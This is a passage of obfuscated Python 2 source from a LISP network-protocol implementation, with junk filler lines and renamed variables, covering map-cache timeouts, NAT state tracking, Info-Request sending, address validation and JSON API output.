if 44 - 44: I1ii11iIi11i % o0oOOo0O0Ooo / iIii1I11I1II1 - o0oOOo0O0Ooo / I11i * I1Ii111
if 49 - 49: iII111i / iII111i - OoOoOO00
if 89 - 89: ooOoO0o
if 16 - 16: oO0o + oO0o + i1IIi + iIii1I11I1II1
if 93 - 93: I1IiiI - i11iIiiIii * I1Ii111 - O0 + iII111i
if 11 - 11: iII111i
if 100 - 100: OoooooooOO / ooOoO0o . OoO0O00
def lisp_timeout_map_cache_entry ( mc , delete_list ) :
if ( mc . map_cache_ttl == None ) :
lisp_update_encap_port ( mc )
return ( [ True , delete_list ] )
if 89 - 89: I11i % II111iiii
if 35 - 35: oO0o
i1iiI11IiIi1 = lisp_get_timestamp ( )
if 65 - 65: II111iiii
if 87 - 87: oO0o / OoO0O00 - oO0o
if 69 - 69: i11iIiiIii
if 29 - 29: IiII . ooOoO0o / iII111i - OOooOOo / OOooOOo % Oo0Ooo
if 42 - 42: OoO0O00 . I1Ii111 . I1IiiI + Oo0Ooo * O0
if 35 - 35: Oo0Ooo / iII111i - O0 - OOooOOo * Oo0Ooo . i11iIiiIii
if ( mc . last_refresh_time + mc . map_cache_ttl > i1iiI11IiIi1 ) :
if ( mc . action == LISP_NO_ACTION ) : lisp_update_encap_port ( mc )
return ( [ True , delete_list ] )
if 43 - 43: OoOoOO00 % oO0o % OoO0O00 / Ii1I . I11i
if 86 - 86: I1Ii111 * i1IIi + IiII - OoOoOO00
if 14 - 14: I1ii11iIi11i / i11iIiiIii * I11i % o0oOOo0O0Ooo + IiII / I1ii11iIi11i
if 82 - 82: OOooOOo . oO0o
if 12 - 12: i11iIiiIii + II111iiii
if ( lisp_nat_traversal and mc . eid . address == 0 and mc . eid . mask_len == 0 ) :
return ( [ True , delete_list ] )
if 49 - 49: OoooooooOO
if 48 - 48: i1IIi . IiII - O0 + OoooooooOO
if 6 - 6: I1Ii111 * OOooOOo + o0oOOo0O0Ooo . I1ii11iIi11i * I1Ii111
if 6 - 6: oO0o / II111iiii
if 23 - 23: IiII - OoooooooOO / oO0o
oO000o0Oo00 = lisp_print_elapsed ( mc . last_refresh_time )
iIIiIIiII111 = mc . print_eid_tuple ( )
lprint ( "Map-cache entry for EID-prefix {} has {}, had uptime of {}" . format ( green ( iIIiIIiII111 , False ) , bold ( "timed out" , False ) , oO000o0Oo00 ) )
if 69 - 69: O0 - OoooooooOO
if 31 - 31: o0oOOo0O0Ooo . i1IIi - i1IIi % i1IIi - iIii1I11I1II1
if 50 - 50: IiII - OOooOOo % OoOoOO00
if 66 - 66: IiII * i11iIiiIii
if 64 - 64: i11iIiiIii . I1Ii111 % i11iIiiIii % I11i
delete_list . append ( mc )
return ( [ True , delete_list ] )
if 56 - 56: o0oOOo0O0Ooo + ooOoO0o + OoooooooOO
if 64 - 64: OOooOOo / OoOoOO00
if 30 - 30: OOooOOo % I1Ii111 - i11iIiiIii
if 20 - 20: i1IIi * I11i / OoO0O00 / i1IIi / I1Ii111 * O0
if 95 - 95: Ii1I + Ii1I % IiII - IiII / OOooOOo
if 46 - 46: IiII + iII111i + II111iiii . iII111i - i11iIiiIii % OoO0O00
if 24 - 24: oO0o + IiII . o0oOOo0O0Ooo . OoooooooOO . i11iIiiIii / I1ii11iIi11i
if 49 - 49: IiII
def lisp_timeout_map_cache_walk ( mc , parms ) :
oOoOOoo0OoO = parms [ 0 ]
iI11 = parms [ 1 ]
if 58 - 58: OoO0O00 + I1ii11iIi11i * oO0o * I11i / oO0o
if 68 - 68: iII111i . IiII . OoooooooOO . I1ii11iIi11i
if 79 - 79: OoooooooOO / i1IIi
if 30 - 30: Ii1I . IiII
if ( mc . group . is_null ( ) ) :
I111I1iiIi1 , oOoOOoo0OoO = lisp_timeout_map_cache_entry ( mc , oOoOOoo0OoO )
if ( oOoOOoo0OoO == [ ] or mc != oOoOOoo0OoO [ - 1 ] ) :
iI11 = lisp_write_checkpoint_entry ( iI11 , mc )
if 24 - 24: O0
return ( [ I111I1iiIi1 , parms ] )
if 6 - 6: I1IiiI . i11iIiiIii . OoooooooOO . I1IiiI . o0oOOo0O0Ooo
if 65 - 65: i11iIiiIii
if ( mc . source_cache == None ) : return ( [ True , parms ] )
if 46 - 46: i11iIiiIii
if 70 - 70: i1IIi + o0oOOo0O0Ooo
if 44 - 44: iII111i . II111iiii % o0oOOo0O0Ooo
if 29 - 29: i11iIiiIii * i1IIi
if 36 - 36: OoO0O00 * I11i . ooOoO0o
parms = mc . source_cache . walk_cache ( lisp_timeout_map_cache_entry , parms )
return ( [ True , parms ] )
if 50 - 50: oO0o * OoOoOO00 / OoO0O00 / ooOoO0o + II111iiii
if 55 - 55: II111iiii - IiII
if 24 - 24: oO0o % Ii1I / i1IIi
if 84 - 84: i1IIi
if 53 - 53: OoooooooOO - i1IIi - Ii1I
if 73 - 73: I1ii11iIi11i - Ii1I * o0oOOo0O0Ooo
if 29 - 29: o0oOOo0O0Ooo % IiII % OOooOOo + OoooooooOO - o0oOOo0O0Ooo
def lisp_timeout_map_cache ( lisp_map_cache ) :
I1I1i = [ [ ] , [ ] ]
I1I1i = lisp_map_cache . walk_cache ( lisp_timeout_map_cache_walk , I1I1i )
if 34 - 34: Ii1I
if 5 - 5: II111iiii . I1ii11iIi11i
if 85 - 85: I1Ii111 . IiII + II111iiii
if 92 - 92: iII111i / o0oOOo0O0Ooo * oO0o . I11i % o0oOOo0O0Ooo
if 87 - 87: Ii1I / Oo0Ooo % iIii1I11I1II1 / iII111i
oOoOOoo0OoO = I1I1i [ 0 ]
for o0o000Oo in oOoOOoo0OoO : o0o000Oo . delete_cache ( )
if 42 - 42: OoO0O00 . I1IiiI . OOooOOo + ooOoO0o
if 87 - 87: OOooOOo
if 44 - 44: Oo0Ooo + iIii1I11I1II1
if 67 - 67: iII111i . OOooOOo / ooOoO0o * iIii1I11I1II1
iI11 = I1I1i [ 1 ]
lisp_checkpoint ( iI11 )
return
if 29 - 29: I1Ii111 / OoOoOO00 % I1ii11iIi11i * IiII / II111iiii
if 10 - 10: O0 / I11i
if 29 - 29: i11iIiiIii % I11i
if 49 - 49: I11i
if 69 - 69: o0oOOo0O0Ooo . O0 * I11i
if 92 - 92: OoO0O00 . O0 / Ii1I % Oo0Ooo . Ii1I
if 40 - 40: o0oOOo0O0Ooo - Ii1I . iII111i - O0
if 53 - 53: Oo0Ooo - I1IiiI * O0 . II111iiii
if 72 - 72: ooOoO0o - Ii1I . Ii1I . I11i / OoooooooOO + Ii1I
if 32 - 32: O0
if 42 - 42: i1IIi * I1ii11iIi11i * OoOoOO00
if 43 - 43: I1ii11iIi11i % I1ii11iIi11i % i1IIi
if 56 - 56: I1IiiI - OoO0O00 - iII111i . o0oOOo0O0Ooo . I1Ii111
if 70 - 70: iIii1I11I1II1 - I11i
if 2 - 2: oO0o / II111iiii * OoO0O00
if 71 - 71: i1IIi + I11i * OoO0O00 . OOooOOo + oO0o
def lisp_store_nat_info ( hostname , rloc , port ) :
oo0o00OO = rloc . print_address_no_iid ( )
ii1Ii1i1ii = "{} NAT state for {}, RLOC {}, port {}" . format ( "{}" ,
blue ( hostname , False ) , red ( oo0o00OO , False ) , port )
if 100 - 100: oO0o / iII111i / i1IIi . II111iiii % I11i - I11i
I1iiI = lisp_nat_info ( oo0o00OO , hostname , port )
if 15 - 15: Ii1I / OOooOOo % i1IIi . I1Ii111 / O0 + I1Ii111
if ( lisp_nat_state_info . has_key ( hostname ) == False ) :
lisp_nat_state_info [ hostname ] = [ I1iiI ]
lprint ( ii1Ii1i1ii . format ( "Store initial" ) )
return ( True )
if 39 - 39: I1ii11iIi11i * I1IiiI * II111iiii . Oo0Ooo % I1IiiI
if 100 - 100: iIii1I11I1II1 - OoooooooOO * OoooooooOO - iII111i / ooOoO0o
if 98 - 98: OoO0O00 + oO0o - II111iiii
if 84 - 84: Oo0Ooo . OoOoOO00 - iII111i
if 5 - 5: OoooooooOO . O0 / OOooOOo + I11i - Ii1I
if 77 - 77: iIii1I11I1II1 * Oo0Ooo . IiII / oO0o + O0
IIiiiiII = lisp_nat_state_info [ hostname ] [ 0 ]
if ( IIiiiiII . address == oo0o00OO and IIiiiiII . port == port ) :
IIiiiiII . uptime = lisp_get_timestamp ( )
lprint ( ii1Ii1i1ii . format ( "Refresh existing" ) )
return ( False )
if 76 - 76: iII111i + o0oOOo0O0Ooo - OoooooooOO * oO0o % OoooooooOO - O0
if 18 - 18: Ii1I
if 82 - 82: OoOoOO00 + OoO0O00 - IiII / ooOoO0o
if 70 - 70: OoO0O00
if 43 - 43: ooOoO0o + OOooOOo + II111iiii - I1IiiI
if 58 - 58: I11i
if 94 - 94: Oo0Ooo
I11II1I1I = None
for IIiiiiII in lisp_nat_state_info [ hostname ] :
if ( IIiiiiII . address == oo0o00OO and IIiiiiII . port == port ) :
I11II1I1I = IIiiiiII
break
if 8 - 8: i1IIi % i1IIi % OoooooooOO % i1IIi . iIii1I11I1II1
if 70 - 70: O0 + II111iiii % IiII / I1Ii111 - IiII
if 58 - 58: II111iiii * oO0o - i1IIi . I11i
if ( I11II1I1I == None ) :
lprint ( ii1Ii1i1ii . format ( "Store new" ) )
else :
lisp_nat_state_info [ hostname ] . remove ( I11II1I1I )
lprint ( ii1Ii1i1ii . format ( "Use previous" ) )
if 23 - 23: OoO0O00 - I1IiiI * i11iIiiIii
if 62 - 62: OoO0O00 . i11iIiiIii / i1IIi
II1i1I1 = lisp_nat_state_info [ hostname ]
lisp_nat_state_info [ hostname ] = [ I1iiI ] + II1i1I1
return ( True )
if 40 - 40: II111iiii
if 56 - 56: II111iiii * iII111i
if 51 - 51: I1IiiI . ooOoO0o / Ii1I / I1Ii111
if 84 - 84: I11i - Ii1I
if 36 - 36: i1IIi
if 21 - 21: iII111i . OoOoOO00 % o0oOOo0O0Ooo - i11iIiiIii
if 86 - 86: I1Ii111 % i11iIiiIii
if 22 - 22: I1Ii111
def lisp_get_nat_info ( rloc , hostname ) :
if ( lisp_nat_state_info . has_key ( hostname ) == False ) : return ( None )
if 64 - 64: OoOoOO00 + II111iiii + o0oOOo0O0Ooo % iIii1I11I1II1 - OOooOOo
oo0o00OO = rloc . print_address_no_iid ( )
for IIiiiiII in lisp_nat_state_info [ hostname ] :
if ( IIiiiiII . address == oo0o00OO ) : return ( IIiiiiII )
if 60 - 60: ooOoO0o % iIii1I11I1II1 / iIii1I11I1II1
return ( None )
if 61 - 61: oO0o
if 12 - 12: iIii1I11I1II1 - I1ii11iIi11i % I1ii11iIi11i * I1Ii111
if 98 - 98: oO0o / iII111i - Oo0Ooo / I1Ii111 * oO0o - OoO0O00
if 12 - 12: IiII . OoooooooOO - iIii1I11I1II1 % iII111i
if 56 - 56: Oo0Ooo / I1IiiI + iIii1I11I1II1 + I1IiiI % iIii1I11I1II1
if 64 - 64: O0
if 55 - 55: OoO0O00 * oO0o . Ii1I + OoOoOO00 % I11i + IiII
if 55 - 55: OoooooooOO + oO0o . o0oOOo0O0Ooo % iIii1I11I1II1 - I1Ii111
if 40 - 40: I1IiiI . o0oOOo0O0Ooo - Oo0Ooo
if 44 - 44: Ii1I % OoO0O00 * oO0o * OoO0O00
if 7 - 7: I1Ii111 % i1IIi . I11i . O0 / i1IIi
if 56 - 56: Oo0Ooo
if 21 - 21: i11iIiiIii * o0oOOo0O0Ooo + Oo0Ooo
if 20 - 20: IiII / OoooooooOO / O0 / I1Ii111 * ooOoO0o
if 45 - 45: ooOoO0o / Oo0Ooo % o0oOOo0O0Ooo . ooOoO0o
if 19 - 19: o0oOOo0O0Ooo % I11i . I1ii11iIi11i
if 70 - 70: Oo0Ooo - I11i / I1ii11iIi11i % OoO0O00 % II111iiii
if 72 - 72: i11iIiiIii * I11i
if 69 - 69: I1Ii111 . Ii1I * I1ii11iIi11i % I11i - o0oOOo0O0Ooo
if 30 - 30: ooOoO0o / Oo0Ooo * iII111i % OoooooooOO / I1ii11iIi11i
def lisp_build_info_requests ( lisp_sockets , dest , port ) :
if ( lisp_nat_traversal == False ) : return
if 64 - 64: OoooooooOO
if 41 - 41: Ii1I . I11i / oO0o * OoooooooOO
if 98 - 98: I1ii11iIi11i - O0 + i11iIiiIii
if 71 - 71: O0 - OoooooooOO
if 82 - 82: i11iIiiIii * II111iiii % IiII
if 80 - 80: Ii1I . i11iIiiIii % oO0o * o0oOOo0O0Ooo
O0o0OoOOOOo = [ ]
o0Oo0000o00 = [ ]
if ( dest == None ) :
for I1I1iiii111II in lisp_map_resolvers_list . values ( ) :
o0Oo0000o00 . append ( I1I1iiii111II . map_resolver )
if 95 - 95: iII111i + OoooooooOO + O0 . OoOoOO00 + I1ii11iIi11i
O0o0OoOOOOo = o0Oo0000o00
if ( O0o0OoOOOOo == [ ] ) :
for ii1iOo in lisp_map_servers_list . values ( ) :
O0o0OoOOOOo . append ( ii1iOo . map_server )
if 79 - 79: OoooooooOO / iII111i / IiII . OoooooooOO
if 92 - 92: I11i + O0 % II111iiii - I1ii11iIi11i + OoooooooOO . iIii1I11I1II1
if ( O0o0OoOOOOo == [ ] ) : return
else :
O0o0OoOOOOo . append ( dest )
if 85 - 85: O0 - ooOoO0o
if 35 - 35: o0oOOo0O0Ooo - I1IiiI
if 47 - 47: i11iIiiIii * iII111i . OoOoOO00 * I1Ii111 % i11iIiiIii + Ii1I
if 65 - 65: Ii1I % i11iIiiIii
if 98 - 98: iII111i * o0oOOo0O0Ooo % Oo0Ooo
IIiiiI1IIi1iI1i = { }
for ooOOo0ooo in lisp_db_list :
for i1III111 in ooOOo0ooo . rloc_set :
lisp_update_local_rloc ( i1III111 )
if ( i1III111 . rloc . is_null ( ) ) : continue
if ( i1III111 . interface == None ) : continue
if 7 - 7: oO0o * OoooooooOO % o0oOOo0O0Ooo . I1Ii111 + O0
IiiIIi1 = i1III111 . rloc . print_address_no_iid ( )
if ( IiiIIi1 in IIiiiI1IIi1iI1i ) : continue
IIiiiI1IIi1iI1i [ IiiIIi1 ] = i1III111 . interface
if 14 - 14: I11i * II111iiii % o0oOOo0O0Ooo / iII111i . OoooooooOO % iII111i
if 88 - 88: iII111i
if ( IIiiiI1IIi1iI1i == { } ) :
lprint ( 'Suppress Info-Request, no "interface = <device>" RLOC ' + "found in any database-mappings" )
if 94 - 94: OoooooooOO
return
if 32 - 32: I1ii11iIi11i
if 8 - 8: I11i * i11iIiiIii - ooOoO0o
if 47 - 47: ooOoO0o . I1IiiI / i11iIiiIii * iII111i * I1IiiI
if 8 - 8: oO0o % oO0o . iII111i / i1IIi % IiII
if 71 - 71: OoOoOO00 + oO0o % O0 + Oo0Ooo
if 62 - 62: i1IIi . Ii1I * i1IIi * O0 . I1IiiI % o0oOOo0O0Ooo
for IiiIIi1 in IIiiiI1IIi1iI1i :
II1i = IIiiiI1IIi1iI1i [ IiiIIi1 ]
OO0o = red ( IiiIIi1 , False )
lprint ( "Build Info-Request for private address {} ({})" . format ( OO0o ,
II1i ) )
OoO0o0OOOO = II1i if len ( IIiiiI1IIi1iI1i ) > 1 else None
for dest in O0o0OoOOOOo :
lisp_send_info_request ( lisp_sockets , dest , port , OoO0o0OOOO )
if 16 - 16: I11i . Ii1I - ooOoO0o . OOooOOo % O0 / oO0o
if 42 - 42: II111iiii . iII111i
if 67 - 67: i1IIi - i11iIiiIii / ooOoO0o * oO0o
if 64 - 64: oO0o / IiII
if 86 - 86: I11i
if 36 - 36: o0oOOo0O0Ooo / OoO0O00
if ( o0Oo0000o00 != [ ] ) :
for I1I1iiii111II in lisp_map_resolvers_list . values ( ) :
I1I1iiii111II . resolve_dns_name ( )
if 6 - 6: I11i % I1IiiI + iII111i * OoooooooOO . O0
if 87 - 87: ooOoO0o / Ii1I % O0 . OoO0O00
return
if 55 - 55: i1IIi . o0oOOo0O0Ooo % OoooooooOO + II111iiii . OoOoOO00
if 32 - 32: IiII * I1Ii111 * Oo0Ooo . i1IIi * OoooooooOO
if 12 - 12: I1IiiI . OOooOOo % Oo0Ooo
if 86 - 86: i11iIiiIii
if 57 - 57: iII111i - OoooooooOO - ooOoO0o % II111iiii
if 62 - 62: i11iIiiIii . Oo0Ooo / Oo0Ooo . IiII . OoooooooOO
if 86 - 86: I1ii11iIi11i * OoOoOO00 + iII111i
if 79 - 79: I11i - II111iiii
def lisp_valid_address_format ( kw , value ) :
if ( kw != "address" ) : return ( True )
if 27 - 27: I1IiiI + o0oOOo0O0Ooo * oO0o % I1IiiI
if 66 - 66: OoO0O00 + IiII . o0oOOo0O0Ooo . IiII
if 88 - 88: oO0o + oO0o % OoO0O00 . OoooooooOO - OoooooooOO . Oo0Ooo
if 44 - 44: I1IiiI * IiII . OoooooooOO
if 62 - 62: I11i - Ii1I / i11iIiiIii * I1IiiI + ooOoO0o + o0oOOo0O0Ooo
if ( value [ 0 ] == "'" and value [ - 1 ] == "'" ) : return ( True )
if 10 - 10: i1IIi + o0oOOo0O0Ooo
if 47 - 47: OOooOOo * IiII % I1Ii111 . OoOoOO00 - OoooooooOO / OoooooooOO
if 79 - 79: I11i % i11iIiiIii % I1IiiI . OoooooooOO * oO0o . Ii1I
if 14 - 14: iIii1I11I1II1 / I11i - o0oOOo0O0Ooo / IiII / o0oOOo0O0Ooo . OoO0O00
if ( value . find ( "." ) != - 1 ) :
IiiIIi1 = value . split ( "." )
if ( len ( IiiIIi1 ) != 4 ) : return ( False )
if 2 - 2: I11i
for iiOoOo in IiiIIi1 :
if ( iiOoOo . isdigit ( ) == False ) : return ( False )
if ( int ( iiOoOo ) > 255 ) : return ( False )
if 81 - 81: Ii1I . i1IIi % iII111i . OoO0O00 % IiII
return ( True )
if 42 - 42: iII111i / Oo0Ooo
if 14 - 14: O0 . Oo0Ooo
if 8 - 8: i11iIiiIii
if 80 - 80: I1ii11iIi11i + Ii1I
if 16 - 16: i11iIiiIii * Oo0Ooo
if ( value . find ( "-" ) != - 1 ) :
IiiIIi1 = value . split ( "-" )
for IiIIi1IiiIiI in [ "N" , "S" , "W" , "E" ] :
if ( IiIIi1IiiIiI in IiiIIi1 ) :
if ( len ( IiiIIi1 ) < 8 ) : return ( False )
return ( True )
if 76 - 76: iII111i . oO0o - i1IIi
if 94 - 94: O0 % iII111i
if 90 - 90: IiII
if 1 - 1: I1ii11iIi11i % OoOoOO00 . I1ii11iIi11i . OoooooooOO % oO0o + Ii1I
if 46 - 46: I1IiiI + OoO0O00 - Oo0Ooo
if 13 - 13: OoOoOO00
if 72 - 72: II111iiii * iII111i . II111iiii + iII111i * IiII
if ( value . find ( "-" ) != - 1 ) :
IiiIIi1 = value . split ( "-" )
if ( len ( IiiIIi1 ) != 3 ) : return ( False )
if 90 - 90: oO0o * I1Ii111 / O0
for IIiii1IiiIiii in IiiIIi1 :
try : int ( IIiii1IiiIiii , 16 )
except : return ( False )
if 81 - 81: I11i
return ( True )
if 31 - 31: OoooooooOO - OoO0O00 . iIii1I11I1II1 % I1IiiI
if 98 - 98: I1IiiI + Ii1I
if 7 - 7: o0oOOo0O0Ooo . OoooooooOO
if 32 - 32: I1ii11iIi11i
if 46 - 46: Ii1I . i11iIiiIii / I1Ii111 - I1ii11iIi11i
if ( value . find ( ":" ) != - 1 ) :
IiiIIi1 = value . split ( ":" )
if ( len ( IiiIIi1 ) < 2 ) : return ( False )
if 13 - 13: IiII % I1Ii111
Ii11iI1Ii1I1 = False
I1I1 = 0
for IIiii1IiiIiii in IiiIIi1 :
I1I1 += 1
if ( IIiii1IiiIiii == "" ) :
if ( Ii11iI1Ii1I1 ) :
if ( len ( IiiIIi1 ) == I1I1 ) : break
if ( I1I1 > 2 ) : return ( False )
if 70 - 70: iIii1I11I1II1 . i1IIi / OOooOOo . oO0o / i11iIiiIii + II111iiii
Ii11iI1Ii1I1 = True
continue
if 89 - 89: I11i * O0 * Oo0Ooo % i1IIi
try : int ( IIiii1IiiIiii , 16 )
except : return ( False )
if 41 - 41: OOooOOo + ooOoO0o - OoOoOO00 . iIii1I11I1II1
return ( True )
if 73 - 73: I1ii11iIi11i / OoooooooOO + II111iiii * Oo0Ooo * I1ii11iIi11i / OoO0O00
if 49 - 49: OOooOOo % Oo0Ooo % OoOoOO00 - OoooooooOO % iII111i - O0
if 62 - 62: iIii1I11I1II1
if 14 - 14: I1Ii111
if 95 - 95: II111iiii / o0oOOo0O0Ooo * OOooOOo
if ( value [ 0 ] == "+" ) :
IiiIIi1 = value [ 1 : : ]
for ooo0O in IiiIIi1 :
if ( ooo0O . isdigit ( ) == False ) : return ( False )
if 1 - 1: I1Ii111
return ( True )
if 57 - 57: oO0o * i1IIi + iIii1I11I1II1
return ( False )
if 13 - 13: I1Ii111 * iII111i
if 46 - 46: Oo0Ooo
if 92 - 92: I1Ii111 * OoO0O00 . ooOoO0o
if 6 - 6: o0oOOo0O0Ooo + OOooOOo
if 75 - 75: Ii1I - II111iiii % I1IiiI . I1Ii111
if 74 - 74: II111iiii - o0oOOo0O0Ooo + ooOoO0o - iIii1I11I1II1 / OoO0O00
if 89 - 89: I1Ii111 + ooOoO0o + I1Ii111
if 35 - 35: O0 * OoOoOO00
if 54 - 54: O0 / Oo0Ooo
if 54 - 54: OoO0O00
if 38 - 38: II111iiii + o0oOOo0O0Ooo * I11i + I1Ii111 - II111iiii . OOooOOo
if 38 - 38: I1ii11iIi11i % OOooOOo + iII111i / Oo0Ooo / IiII / oO0o
def lisp_process_api ( process , lisp_socket , data_structure ) :
iiiIi1IIiIiI11I , I1I1i = data_structure . split ( "%" )
if 16 - 16: oO0o
lprint ( "Process API request '{}', parameters: '{}'" . format ( iiiIi1IIiIiI11I ,
I1I1i ) )
if 32 - 32: OoooooooOO
i1I = [ ]
if ( iiiIi1IIiIiI11I == "map-cache" ) :
if ( I1I1i == "" ) :
i1I = lisp_map_cache . walk_cache ( lisp_process_api_map_cache , i1I )
else :
i1I = lisp_process_api_map_cache_entry ( json . loads ( I1I1i ) )
if 77 - 77: Oo0Ooo . i1IIi - I11i
if 98 - 98: O0
if ( iiiIi1IIiIiI11I == "site-cache" ) :
if ( I1I1i == "" ) :
i1I = lisp_sites_by_eid . walk_cache ( lisp_process_api_site_cache ,
i1I )
else :
i1I = lisp_process_api_site_cache_entry ( json . loads ( I1I1i ) )
if 87 - 87: OoO0O00 % I1Ii111 - OOooOOo - II111iiii + iII111i
if 54 - 54: i1IIi % iII111i
if ( iiiIi1IIiIiI11I == "map-server" ) :
I1I1i = { } if ( I1I1i == "" ) else json . loads ( I1I1i )
i1I = lisp_process_api_ms_or_mr ( True , I1I1i )
if 16 - 16: II111iiii - Oo0Ooo
if ( iiiIi1IIiIiI11I == "map-resolver" ) :
I1I1i = { } if ( I1I1i == "" ) else json . loads ( I1I1i )
i1I = lisp_process_api_ms_or_mr ( False , I1I1i )
if 44 - 44: OOooOOo / Oo0Ooo - I1ii11iIi11i + I11i . oO0o
if ( iiiIi1IIiIiI11I == "database-mapping" ) :
i1I = lisp_process_api_database_mapping ( )
if 85 - 85: iIii1I11I1II1 / Ii1I
if 43 - 43: I1IiiI % I1Ii111 - oO0o . II111iiii / iIii1I11I1II1
if 97 - 97: I1Ii111 + I1ii11iIi11i
if 21 - 21: O0 + o0oOOo0O0Ooo * OoooooooOO % IiII % I1ii11iIi11i
if 80 - 80: I11i
i1I = json . dumps ( i1I )
iiiii1i1 = lisp_api_ipc ( process , i1I )
lisp_ipc ( iiiii1i1 , lisp_socket , "lisp-core" )
return
if 28 - 28: OoOoOO00 * OoooooooOO * i11iIiiIii
if 88 - 88: ooOoO0o + ooOoO0o / I1Ii111
if 69 - 69: O0 * o0oOOo0O0Ooo + i1IIi * ooOoO0o . o0oOOo0O0Ooo
if 46 - 46: Oo0Ooo / Oo0Ooo * IiII
if 65 - 65: iIii1I11I1II1 * o0oOOo0O0Ooo - iII111i % II111iiii - I1ii11iIi11i
if 65 - 65: I11i
if 92 - 92: iII111i . IiII + i1IIi % i1IIi
def lisp_process_api_map_cache ( mc , data ) :
if 11 - 11: I1ii11iIi11i + iIii1I11I1II1 - I1Ii111 * iIii1I11I1II1 * IiII + oO0o
if 6 - 6: I1Ii111 * OOooOOo + i1IIi - Ii1I / oO0o
if 81 - 81: I1Ii111 % oO0o * i1IIi * OoooooooOO / Oo0Ooo
if 70 - 70: I1IiiI
if ( mc . group . is_null ( ) ) : return ( lisp_gather_map_cache_data ( mc , data ) )
if 35 - 35: i11iIiiIii
if ( mc . source_cache == None ) : return ( [ True , data ] )
if 59 - 59: ooOoO0o . iII111i - II111iiii
if 30 - 30: o0oOOo0O0Ooo % iII111i - i11iIiiIii
if 25 - 25: i11iIiiIii + OoOoOO00 + oO0o / Ii1I * Oo0Ooo + Oo0Ooo
if 26 - 26: I1IiiI % I1ii11iIi11i + o0oOOo0O0Ooo / I1ii11iIi11i - I1IiiI
if 55 - 55: OoooooooOO
data = mc . source_cache . walk_cache ( lisp_gather_map_cache_data , data )
return ( [ True , data ] )
if 2 - 2: Oo0Ooo + I11i / OOooOOo + OOooOOo
if 62 - 62: OOooOOo . iIii1I11I1II1 + I1IiiI / OOooOOo
if 90 - 90: OOooOOo
if 29 - 29: OoOoOO00 - I1IiiI / oO0o + Oo0Ooo + I1Ii111 + O0
if 65 - 65: oO0o
if 38 - 38: iIii1I11I1II1 / I1Ii111 + ooOoO0o . II111iiii - iIii1I11I1II1
if 13 - 13: Ii1I
def lisp_gather_map_cache_data ( mc , data ) :
i1ii1i1Ii11 = { }
i1ii1i1Ii11 [ "instance-id" ] = str ( mc . eid . instance_id )
i1ii1i1Ii11 [ "eid-prefix" ] = mc . eid . print_prefix_no_iid ( )
if ( mc . group . is_null ( ) == False ) :
i1ii1i1Ii11 [ "group-prefix" ] = mc . group . print_prefix_no_iid ( )
if 34 - 34: I1IiiI / iIii1I11I1II1
i1ii1i1Ii11 [ "uptime" ] = lisp_print_elapsed ( mc . uptime )
i1ii1i1Ii11 [ "expires" ] = lisp_print_elapsed ( mc . uptime )
i1ii1i1Ii11 [ "action" ] = lisp_map_reply_action_string [ mc . action ]
i1ii1i1Ii11 [ "ttl" ] = "--" if mc . map_cache_ttl == None else str ( mc . map_cache_ttl / 60 )
if 35 - 35: oO0o / oO0o
if 86 - 86: o0oOOo0O0Ooo . Oo0Ooo - Ii1I / i11iIiiIii
if 63 - 63: oO0o - O0 + I1ii11iIi11i + Ii1I / i1IIi
if 77 - 77: O0
if 49 - 49: o0oOOo0O0Ooo / i11iIiiIii
OoO0oOOooOO = [ ]
for I1IIiIIIii in mc . rloc_set :
O0OOOO0o0O = lisp_fill_rloc_in_json ( I1IIiIIIii )
if 36 - 36: II111iiii
if 78 - 78: OoO0O00 + iIii1I11I1II1 * i1IIi
if 7 - 7: i11iIiiIii
if 49 - 49: I1IiiI - oO0o % OOooOOo / O0 / II111iiii
if 41 - 41: IiII % II111iiii
if ( I1IIiIIIii . rloc . is_multicast_address ( ) ) :
O0OOOO0o0O [ "multicast-rloc-set" ] = [ ]
for Oo0O00000o0OO in I1IIiIIIii . multicast_rloc_probe_list . values ( ) :
I1I1iiii111II = lisp_fill_rloc_in_json ( Oo0O00000o0OO )
O0OOOO0o0O [ "multicast-rloc-set" ] . append ( I1I1iiii111II )
if 99 - 99: IiII - O0
if 59 - 59: iII111i % O0 + OOooOOo * ooOoO0o
if 27 - 27: I1Ii111 % i11iIiiIii * I1IiiI
OoO0oOOooOO . append ( O0OOOO0o0O )
if 19 - 19: OoOoOO00 / o0oOOo0O0Ooo - iII111i / OoO0O00
i1ii1i1Ii11 [ "rloc-set" ] = OoO0oOOooOO
if 12 - 12: I1ii11iIi11i - I11i * O0 % I1IiiI + O0 - II111iiii
data . append ( i1ii1i1Ii11 )
return ( [ True , data ] )
if 13 - 13: iII111i / OOooOOo * i11iIiiIii / oO0o / OoooooooOO
if 89 - 89: Ii1I * Oo0Ooo / I1Ii111 * I1ii11iIi11i + O0 * Oo0Ooo
if 74 - 74: I11i . I11i
if 74 - 74: OoOoOO00 * ooOoO0o * I1Ii111
if 56 - 56: iIii1I11I1II1 * OoO0O00 - oO0o * Ii1I
if 62 - 62: i1IIi + I11i / OOooOOo - OoooooooOO % i1IIi . I1IiiI
if 13 - 13: O0 * iII111i
if 26 - 26: i1IIi - I1Ii111 - ooOoO0o
def lisp_fill_rloc_in_json ( rloc ) :
O0OOOO0o0O = { }
if ( rloc . rloc_exists ( ) ) :
O0OOOO0o0O [ "address" ] = rloc . rloc . print_address_no_iid ( )
if 73 - 73: o0oOOo0O0Ooo . OoooooooOO
if 96 - 96: i1IIi - OOooOOo / I11i % OoOoOO00 - i11iIiiIii % II111iiii
if ( rloc . translated_port != 0 ) :
O0OOOO0o0O [ "encap-port" ] = str ( rloc . translated_port )
if 47 - 47: I1Ii111 * iII111i
O0OOOO0o0O [ "state" ] = rloc . print_state ( )
if ( rloc . geo ) : O0OOOO0o0O [ "geo" ] = rloc . geo . print_geo ( )
if ( rloc . elp ) : O0OOOO0o0O [ "elp" ] = rloc . elp . print_elp ( False )
if ( rloc . rle ) : O0OOOO0o0O [ "rle" ] = rloc . rle . print_rle ( False , False )
if ( rloc . json ) : O0OOOO0o0O [ "json" ] = rloc . json . print_json ( False )
if ( rloc . rloc_name ) : O0OOOO0o0O [ "rloc-name" ] = rloc . rloc_name
I1i1IIiIIiIiIi = rloc . stats . get_stats ( False , False )
if ( I1i1IIiIIiIiIi ) : O0OOOO0o0O [ "stats" ] = I1i1IIiIIiIiIi
O0OOOO0o0O [ "uptime" ] = lisp_print_elapsed ( rloc . uptime )
O0OOOO0o0O [ "upriority" ] = str ( rloc . priority )
O0OOOO0o0O [ "uweight" ] = str ( rloc . weight )
O0OOOO0o0O [ "mpriority" ] = str ( rloc . mpriority )
O0OOOO0o0O [ "mweight" ] = str ( rloc . mweight )
